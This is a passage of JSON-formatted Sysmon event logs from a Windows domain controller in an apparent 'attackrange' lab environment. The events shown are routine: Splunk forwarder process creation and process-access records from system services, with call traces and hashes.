Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4137,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.509\r\nProcessGuid: {A837DB8D-02BF-5F25-0000-00101C150600}\r\nProcessId: 4728\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.509","ProcessGuid":"{A837DB8D-02BF-5F25-0000-00101C150600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4138,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02BF-5F25-0000-00101C150600}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02BF-5F25-0000-00101C150600}","TargetProcessId":"4728","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4139,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02BF-5F25-0000-00101C150600}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02BF-5F25-0000-00101C150600}","TargetProcessId":"4728","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4140,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4141,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4142,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4143,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4144,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
